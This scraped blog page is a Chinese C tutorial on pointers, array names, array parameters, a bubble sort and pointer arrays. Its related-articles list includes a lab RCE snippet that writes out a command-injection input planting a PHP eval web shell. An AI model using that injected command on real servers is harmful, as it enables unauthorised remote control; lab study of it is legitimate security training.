手把手带你拿捏C指针(2)(含冒泡排序)

news/2024/9/18 14:51:12/ 标签: c语言, 开发语言, c++, java, 蓝桥杯, 程序人生, 面试

在这里插入图片描述

文章目录

  • 一、数组名的理解
  • 二、使用指针访问数组
  • 三、一维数组传参本质
  • 四、冒泡排序
  • 五、二级指针
  • 六、指针数组
  • 七、指针数组模拟二维数组

一、数组名的理解

在上⼀个章节我们在使⽤指针访问数组的内容时,有这样的代码:

int arr[10] = {1,2,3,4,5,6,7,8,9,10};
int *p = &arr[0];

    这⾥我们使⽤ &arr[0] 的⽅式拿到了数组第⼀个元素的地址,但是其实数组名本来就是地址,⽽且是数组⾸元素的地址,我们来做个测试

#include <stdio.h>
int main()
{int arr[10] = { 1,2,3,4,5,6,7,8,9,10 };printf("&arr[0] = %p\n", &arr[0]);printf("arr = %p\n", arr);return 0;
}

输出结果:
在这里插入图片描述
    我们发现数组名和数组⾸元素的地址打印出的结果⼀模⼀样,数组名就是数组首元素(第⼀个元素)的地址
    这时候有同学会有疑问?数组名如果是数组⾸元素的地址,那下⾯的代码怎么理解呢?

#include <stdio.h>
int main()
{int arr[10] = { 1,2,3,4,5,6,7,8,9,10 };printf("%d\n", sizeof(arr));return 0;
}

    输出的结果是:40,如果arr是数组⾸元素的地址,那输出应该的应该是4/8才对。
    其实数组名就是数组⾸元素(第⼀个元素)的地址是对的,但是有两个例外:

  • sizeof(数组名),sizeof中单独放数组名,这⾥的数组名表⽰整个数组,计算的是整个数组的大小,单位是字节
  • &数组名,这⾥的数组名表⽰整个数组,取出的是整个数组的地址(整个数组的地址和数组⾸元素的地址是有区别的)

除此之外,任何地⽅使⽤数组名,数组名都表⽰⾸元素的地址

这时有好奇的同学,再试⼀下这个代码:

#include <stdio.h>
int main()
{int arr[10] = { 1,2,3,4,5,6,7,8,9,10 };printf("&arr[0] = %p\n", &arr[0]);printf("arr     = %p\n", arr);printf("&arr    = %p\n", &arr);return 0;
}

运行结果:
在这里插入图片描述
    我们发现它们三个打印出来居然是一样的,那arr和&arr有什么区别呢?我们看以下的一个例子:

#include <stdio.h>
int main()
{int arr[10] = { 1,2,3,4,5,6,7,8,9,10 };printf("&arr[0]   = %p\n", &arr[0]);printf("&arr[0]+1 = %p\n", &arr[0]+1);printf("arr       = %p\n", arr);printf("arr+1     = %p\n", arr+1);printf("&arr      = %p\n", &arr);printf("&arr+1    = %p\n", &arr+1);return 0;
}

运行结果如下:
在这里插入图片描述
    这⾥我们发现&arr[0]和&arr[0]+1相差4个字节,arr和arr+1 相差4个字节,是因为&arr[0] 和 arr 都是⾸元素的地址,+1就是跳过⼀个元素
    这⾥我们发现&arr[0]和&arr[0]+1相差4个字节,arr和arr+1 相差4个字节,是因为&arr[0] 和 arr 都是⾸元素的地址,+1就是跳过⼀个元素
    总结:数组名一般是数组首元素地址,只有两个例外,一个是它在sizeof中一个是&arr

二、使用指针访问数组

    有了前面知识的基础,我们用指针访问数组就显得简单多了,当我们要对数组进行输入时,我们还是使用循环,scanf后面的参数我们就可以写成arr+i,因为i=0时,arr+0就是首元素的地址,i=1时,arr+1就是第二个元素的地址,依此类推
    输出数组时也是同理,就是对原本的指针进行解引用,如下例:

#include <stdio.h>
int main()
{int arr[10] = {0};//输⼊int i = 0;int sz = sizeof(arr)/sizeof(arr[0]);//输⼊int* p = arr;for(i=0; i<sz; i++){scanf("%d", p+i);
//也可以这样写:
//scanf("%d", arr+i);}//输出for(i=0; i<sz; i++){printf("%d ", *(p+i));}return 0;
}

    这个代码搞明⽩后,我们再试⼀下,如果我们再分析⼀下,数组名arr是数组⾸元素的地址,可以赋值给p,其实数组名arr和p在这⾥是等价的。那我们现在可以大胆想象一下,可以使⽤arr[i]可以访问数组的元素,那p[i]是否也可以访问数组呢?如下代码:

 for(i=0; i<sz; i++){printf("%d ", p[i]);}

我们来看看代码运行结果:
在这里插入图片描述
    可以发现确实是这样,将 * (p+i)换成p[i]也是能够正常打印的,因为本质上p[i] 是等价于 * (p+i)。
    同理arr[i] 应该等价于 *(arr+i),数组元素的访问在编译器处理的时候,也是转换成⾸元素的地址+偏移量求出元素的地址,然后解引⽤来访问的
    随后我们可以继续思考,既然arr[i]就等价于 * (arr+i),我们可以想一下,它是否 就等于 * (i+arr),很明显这是肯定的,那arr[i]是否就可以写成i[arr]呢?p[i]是否可以写成i[p]?这个确实有点匪夷所思,实践出真知,我们接下来就进入实验,如下代码:

int main()
{int arr[10] = { 1,2,3,4,5,6,7,8,9,10 };int i = 0;int sz = sizeof(arr) / sizeof(arr[0]);int* p = arr;for (i = 0; i < sz; i++){printf("%d ", i[arr]);}printf("\n");for (i = 0; i < sz; i++){printf("%d ", i[p]);}return 0;
}

我们来看看运行结果:
在这里插入图片描述
    我们可以看到这样确实可以,是不是很震惊,我刚开始学到这里也是这样的,但是也确实很有趣。
    从这个例子我们也可以得出,下标访问操作符[]它的实际作用就是将它的两个操作数转换成指针的形式,比如将arr[i]转换为*(arr+i),如果是i[arr]就转换成 * (i+arr),这两个东西是等价的,所以我们将i和arr交换位置才没有问题

三、一维数组传参本质

    数组我们学过了,之前也讲了,数组是可以传递给函数的,这个⼩节我们讨论⼀下数组传参的本质。⾸先从⼀个问题开始,我们之前都是在函数外部计算数组的元素个数,那我们可以把数组传给⼀个函数后,函数内部求数组的元素个数吗?

#include <stdio.h>
void test(int arr[])
{int sz2 = sizeof(arr)/sizeof(arr[0]);printf("sz2 = %d\n", sz2);
}
int main()
{int arr[10] = {1,2,3,4,5,6,7,8,9,10};int sz1 = sizeof(arr)/sizeof(arr[0]);printf("sz1 = %d\n", sz1);test(arr);return 0;
}

我们来看看运行结果:
在这里插入图片描述
    我们发现在函数内部是没有正确获得数组的元素个数
    这就要学习数组传参的本质了,上个⼩节我们学习了:数组名是数组⾸元素的地址;那么在数组传参的时候,传递的是数组名,也就是说本质上数组传参传递的是数组⾸元素的地址
    所以函数形参的部分理论上应该使⽤指针变量来接收⾸元素的地址。那么在函数内部我们写sizeof(arr) 计算的是⼀个地址的大小(单位字节)而不是数组的⼤小(单位字节)。正是因为函数的参数部分是本质是指针,所以在函数内部是没办法求的数组元素个数的
    随后我们也能推导出,既然一维数组传参是传的首元素的地址,那么我们是否就可以用指针接收,接下来看另一个例子:

#include <stdio.h>
void test1(int arr[])//参数写成数组形式,本质上还是指针
{printf("%d\n", sizeof(arr));
}void test2(int* p)//参数写成指针形式
{printf("%d\n", sizeof(p));//计算⼀个指针变量的⼤⼩
}int main()
{int arr[10] = { 1,2,3,4,5,6,7,8,9,10 };test1(arr);test2(arr);return 0;
}

我们来看一下运行结果:
在这里插入图片描述
    总结:⼀维数组传参,形参的部分可以写成数组的形式,也可以写成指针的形式

四、冒泡排序

    冒泡排序就是模拟冒泡的样子,数据不同,那么泡泡的大小就不同,小泡泡就会慢慢浮上去,按这个理解,冒泡排序默认是升序的,今天我们写一个冒泡排序,既可以升序,也可以降序
    冒泡排序的原理就是比较一堆数中相邻的两个数,如果升序的话就是把小的那个数换到前面,如果是降序的话,就是把大的数换到前面
接下来我们开始设计冒泡排序函数:

  1. 函数命名:推荐:Bubble_sort,可以自行取名
  2. 函数参数:由于我们要对一堆数进行排序,所以我们需要一个数组帮我们存储这些数,随后我们需要这个数组的元素个数,最后由于我们设计的冒泡函数既有升序又有降序,所以我们可以将第三个参数用于辨别是升序还是降序,在这里我们就定义:第三个参数是0就是升序,第三个参数是1就是降序
  3. 函数实现:
    (1)冒泡排序的中心思想就是比较相邻的两个数,看它们的大小比较,然后适时交换,现在我们以升序举例,如果左边的数大于右边的数,那么就对它们进行交换
    (2)接着我们思考一下需要交换多少次,我们现在举一个比较极端的例子,如下图所示:
    在这里插入图片描述
        可以看到在这个例子中,7一直在做交换,那它最多做几次交换呢?经过推算,我们知道,在第七次交换时,7就已经交换好了,也就是总共8个数,需要交换8-1次,n个数就要交换n-1次,当然,这是最差的情况
    (3)我们将7这个数换到了它正确的地方,经过了多次交换,我们就叫它一趟冒泡排序,一趟冒泡排序可以排好一个数字,那么一共有8个数字就需要7趟冒泡排序,因为如果把7个数字放在正确位置上了,那么第8个数字一定就在正确的位置上
    (4)所以经过分析,我们知道了我们需要进行多趟冒泡排序,一趟冒泡排序可能有多次交换,所以我们需要两层循环,外层负责多趟,内层负责一趟的多次交换
    (5)那么需要多少趟呢?在上面的例子中,我们了解到应该需要n-1趟,那每一趟可能需要交换多少次呢?这个就会随着循环的变化而变化,比如第一趟时需要n-1趟,又比如我们已经进行了一趟冒泡排序,那么就有1个数字排到了正确位置,这个时候就最多只需要n–1-1次交换,所以一趟需要交换多少次是会变化的,每完成一趟就少一次交换,所以我们可以写成n-i-1
    (6)最后就是对数组中挨着的两个元素进行比较大小,我们可以设计一个if进行判断,如果第三个参数是0,那么进行升序排序,如果是1,就升序,这里用升序排序举例,如果左边大一些,那么就把两个数交换,否则不做任何修改
    (7)有可能当我们只排序两三趟就完成了排序,后面的判断就有点浪费,所以我们可以创建一个变量flag作为标志,我们将其设置为1,含义是排序已经完成,然后每次进入交换时就把它置为0,如果没有产生交换就说明排序已经完成,就可以结束,以上就是整个冒泡排序的思路
    (8)代码:
//冒泡排序:
void Bubble_sort(int arr[], int sz, int x)
{int i = 0;int j = 0;for (i = 0; i < sz-1; i++){//假设已经排序完成int flag = 1;for (j = 0; j < sz-i-1; j++){if (x == 0){if (arr[j] > arr[j + 1]){int exg = arr[j];arr[j] = arr[j + 1];arr[j + 1] = exg;flag = 0;}}else if (x == 1) {if (arr[j] < arr[j + 1]){int exg = arr[j];arr[j] = arr[j + 1];arr[j + 1] = exg;flag = 0;}}}if (flag == 1){break;}}
}void print(int arr[], int sz)
{for (int i = 0; i < sz; i++){printf("%d ", arr[i]);}
}int main()
{int arr[10] = { 2,5,8,4,6,1,9,3,7,10 };int sz = sizeof(arr) / sizeof(arr[0]);Bubble_sort(arr, sz, 0);//第三个参数是0就升序//是1就是降序print(arr, sz);return 0;
}
  1. 最后我们来运行一下这个代码,看看我们的冒泡排序是否成功:
    升序:
    在这里插入图片描述
    降序:
    在这里插入图片描述

五、二级指针

    指针变量也是变量,是变量就有地址,那指针变量的地址存放在哪⾥?
    这就是二级指针,二级指针就是存放指针变量的地址,创建方式如下:

#include <stdio.h>
int main()
{int a = 0;int* pa = &a;int** ppa = &pa;return 0;
}

在这里插入图片描述
对于⼆级指针的运算有:

  1. *ppa 通过对ppa中的地址进⾏解引⽤,这样找到的是 pa , *ppa 其实访问的就是 pa,如下例:
int b = 20;
*ppa = &b;//等价于 pa = &b;
  1. **ppa 先通过 *ppa 找到 pa ,然后对 pa 进⾏解引⽤操作: *pa ,那找到的是 a,如下例:
**ppa = 30;
//等价于*pa = 30;
//等价于a = 30;

二级指针用的也比较少,后面会举例讲解,现在了解一下

六、指针数组

    指针数组是指针还是数组?
    我们类⽐⼀下,整型数组,是存放整型的数组,字符数组是存放字符的数组
那指针数组呢?是存放指针的数组
在这里插入图片描述
    指针数组的每个元素都是⽤来存放地址(指针)的,如下图:
在这里插入图片描述
    指针数组的每个元素是地址,分别指向⼀块区域

七、指针数组模拟二维数组

    我们可以创建几个数组,然后将数组的地址分别存入一个指针数组,如下:

int arr1[] = { 1,2,3,4,5,6 };
int arr2[] = { 2,3,4,5,6,7 };
int arr3[] = { 3,4,5,6,7,8 };
int* parr[] = {arr1,arr2,arr3};

    然后现在当我们访问指针数组parr的第一个元素时,我们发现parr[0]就是arr1的地址

    我们之前讲过,我们要访问数组的元素,不一定必须写出诸如arr[i]的样式,只要是arr首元素的地址都可以,比如假设有一个指针变量p存放了数组arr的首元素地址,那么可以使用p[i]来访问数组

    这里也是同理parr[0]就是第一个数组的数组名,也是该数组首元素地址,所以为了方便理解,我们将parr[0]想象成数组arr1的数组名,那么arr1的第一个元素表示为arr1[0],即parr[0][0],第二个元素为arr1[1],即parr[0][1]

    然后同理parr[1]就是第二个数组的数组名,也是该数组首元素地址,所以为了方便理解,我们也可以将parr[1]想像成arr2的数组名,那么arr2的第一个元素表示为arr2[0],即parr[1][0],第二个元素为arr2[1],即parr[1][1]

    经过上面的讲解,聪明的你是否已经发现,我们通过指针数组存放若干个数组地址,通过访问指针数组来访问原数组,实现了类似于二维数组的效果,在上例中,arr1相当于这个二维数组的第一行,arr2相当于这个二维数组的第二行,arr3相当于第三行

    接下来我们来看看这个完整过程是怎样的,以及它的运行结果:

#include <stdio.h>
int main()
{int arr1[] = { 1,2,3,4,5,6 };int arr2[] = { 2,3,4,5,6,7 };int arr3[] = { 3,4,5,6,7,8 };int* parr[] = {arr1,arr2,arr3};int i = 0;int j = 0;for (i = 0; i < 3; i++){for (j = 0; j < 6; j++){printf("%d ", parr[i][j]);}printf("\n");}return 0;
}

运行结果:
在这里插入图片描述
    可以看到确实通过指针数组,我们模拟实现了二维数组,今天的内容就到这里,你是否醍醐灌顶了呢?
    敬请期待下一篇指针(3)吧!


http://www.ppmy.cn/news/1524537.html

相关文章

C语言-qosrt函数—秩序大师

1、qsort()的作用 在我们的日常生活中&#xff0c;排序无处不在。想象一下&#xff0c;当你整理书架时&#xff0c;会按照书籍的类别、作者或者大小进行排列&#xff0c;让你的阅读空间更加整洁有序。又比如&#xff0c;在超市的货架上&#xff0c;商品通常也是按照一定的规则进…

pytest二次开发:生成用例参数

pytest.fixture是一个装饰器&#xff0c;用于声明一个fixture。Fixture是pytest中的一个核心概念&#xff0c;它提供了一种将测试前的准备代码&#xff08;如设置测试环境、准备测试数据等&#xff09;和测试后的清理代码&#xff08;如恢复测试环境、删除临时文件等&#xff0…

jenkins工具的介绍和gitlab安装

使用方式 替代手动&#xff0c;自动化拉取、集成、构建、测试&#xff1b;是CI/CD持续集成、持续部署主流开发模式中重要工具&#xff1b;必须组件 jenkins-gitlab&#xff0c;代码公共仓库服务器&#xff08;至少6G内存&#xff09;&#xff1b;jenkins-server&#xff0c;需…

Pikachu靶场之RCE漏洞详解

一.exec "ping" 1.ping本机127.0.0.1 2.用&符拼接dir查看目录 3.&拼接echo输入一句话木马 127.0.0.1&echo "<?php eval($_POST[cmd]);?>)" > 6.php 4.同级目录访问6.php&#xff0c;蚁剑连接 二&#xff1a;exec "eval"…

Python中的`set`和`frozenset`的区别

在Python中&#xff0c;set和frozenset是两种用于存储不重复元素的数据结构&#xff0c;它们都属于集合&#xff08;Set&#xff09;类型&#xff0c;但在使用场景、功能特性和性能表现上存在一些关键的区别。 1. 基本概念 set set是Python中的一个内置数据类型&#xff0c;…

滑动窗口——优选算法

个人主页&#xff1a;敲上瘾-CSDN博客 个人专栏&#xff1a;游戏、数据结构、c语言基础、c学习、算法 目录 一.滑动窗口算法原理&#xff1a; 二.无重复字符的最长子串 1.题目解析​编辑 2.算法原理 3.代码编写 三.长度最小的子数组 1.题目解析 2.算法原理 3.代码编…

太能装了,国内有没有二本恋综?

9月&#xff0c;国内头部恋综IP节目《心动的信号第七季》开播。然而&#xff0c;与恋爱甜度相比&#xff0c;嘉宾们的“装”感却率先成为了舆论焦点。 事件起因为首集嘉宾初次会面时&#xff0c;为塑造精英形象太过刻意的行为举止。 其中&#xff0c;最具代表性的场景来自于&…

JDBC详细知识点和操作

javaweb的作用&#xff0c;属于中间者&#xff0c;负责逻辑处理 这三部分互相协作组成了网页 javaweb也就是这三部分 一.数据库部分&#xff08;略&#xff09; 二.javaweb程序 1.JDBC 概念&#xff1a;通过java代码操作数据库 数据库种类有很多&#xff0c;比如Oracle&a…

爬虫3:re正则表达式获取数据

在上一章中&#xff0c;我们基本上掌握了抓取整个网页的基本技能.但是呢&#xff0c;大多数情况下&#xff0c;我们并不需要整个网页的内容,只是 需要那么一小部分&#xff0c;怎么办呢&#xff1f;这就涉及到了数据提取的问题. 本课程中&#xff0c;提供三种解析方式&#xff…

【2025】基于Python的空气质量综合分析系统的设计与实现(源码+文档+调试+答疑)

博主介绍&#xff1a; ✌我是阿龙&#xff0c;一名专注于Java技术领域的程序员&#xff0c;全网拥有10W粉丝。作为CSDN特邀作者、博客专家、新星计划导师&#xff0c;我在计算机毕业设计开发方面积累了丰富的经验。同时&#xff0c;我也是掘金、华为云、阿里云、InfoQ等平台…

Excel如何设置不能复制里面内容?学学工作表保护功能

大家好&#xff0c;这里是效率办公指南&#xff01; &#x1f4ca; 在这个信息爆炸的时代&#xff0c;数据安全变得尤为重要。Excel文件中的数据往往包含了敏感信息&#xff0c;如何确保这些数据不被未经授权的人复制&#xff0c;成为了我们日常工作中的一个挑战。今天&#x…

【Linux 从基础到进阶】Ansible自动化运维工具使用

Ansible自动化运维工具使用 Ansible 是一款开源的自动化运维工具,采用无代理架构(agentless),基于 SSH 连接进行管理,具有简单易用、灵活强大、可扩展性高等特点。它广泛用于服务器管理、应用部署、配置管理等任务。本文将介绍 Ansible 的安装、基本使用方法及一些实际运…

uniapp+vue3实现小程序和h5解压线上压缩包以及如何访问解压后的视频地址

安装jszip插件 npm install jszip 对应功能实现和逻辑处理&#xff1a; <script setup>import { onMounted, reactive, ref } from vueimport { onHide, onUnload } from dcloudio/uni-appimport JSZip from jsziplet videoSrc ref() // 视频地址// 创建JSZip实例con…

基于 PyTorch 和 TensorFlow 的口罩检测与人脸识别系统

在后疫情时代&#xff0c;口罩检测成为了人脸识别系统的一个重要功能。如何在戴口罩的情况下准确识别身份&#xff0c;是一个技术难点。本文将介绍如何利用 PyTorch 和 TensorFlow 实现一个包含口罩检测功能的简单人脸识别系统&#xff0c;结合了Facenet 模型用于特征提取&…

南卡OE PRO2开放式耳机发布,引领开放式音频技术新革命

NANK南卡品牌作为国内的音频大牌&#xff0c;在开放式耳机领域不断的探索尝试&#xff0c;此次新上线的南卡OE Pro2开放式耳机更是集合了南卡整个品牌的多项核心技术和多年心血&#xff0c;即将成为这个领域的尖端产品&#xff0c;这也是南卡开发出新蓝海的象征&#xff0c;预示…

香港科技大学工学2025/2026年度硕士研究生(MSc)项目招生宣讲会

&#x1f514;香港科技大学工学院2025/2026年度硕士研究生&#xff08;MSc&#xff09;项目招生宣讲会 &#x1f559;时间&#xff1a;2024年9月25日&#xff08;星期三&#xff09;19:00 &#x1f3e0;地点&#xff1a;华南理工大学五山校区33号楼403室 &#x1f386;2024Ti…

GEE 案例——如何利用CHIRPS/DAILY影像数据进行时序降水数据分析?

目录 简介 数据 函数 ui.Chart.image.series(imageCollection, region, reducer, scale, xProperty) Arguments: Returns: ui.Chart 代码 结果 简介 这里我们利用2000年-2023年的CHIRPS/DAILY数据来实现降水数据的长时序分析。 数据 UCSB-CHG/CHIRPS/DAILY是一个基于…

MATLAB入门教程

MATLAB安装教程可参考链接&#xff1a;matlab怎么安装 matlab安装教程-电脑软件-PHP中文网 1.MATLAB的工作环境 &#xff08;1&#xff09;命令窗(command window) 是对MATLAB进行操作的主要载体。默认情况下&#xff0c;启动MATLAB时就打开命令窗。MATLAB的所有所数…

Peewee+Postgresql+PooledPostgresqlDatabase重连机制

需求&#xff1a; Postgresql数据库服务重启后&#xff0c;需要业务代码正常读写数据库 方案&#xff1a; 通过继承playhouse.shortcuts.ReconnectMixin和playhouse.pool.PooledPostgresqlDatabase来创建一个新的ReconnectPooledPostgresqlDatabase类修改reconnect_errors属性来…

何时空仓库

某仓库现存货物 s 箱&#xff0c;每天上午出货 m 箱、下午进货 n 箱&#xff0c;若s≥m>n≥0&#xff0c;则第 k 天将会出现空仓的情况。请你帮仓库管理员编写程序&#xff0c;输入s、m 和 n&#xff0c;计算并输出 k。 输入格式 s,m,n (s≥m>n≥0) 输出格式 k 输入样例…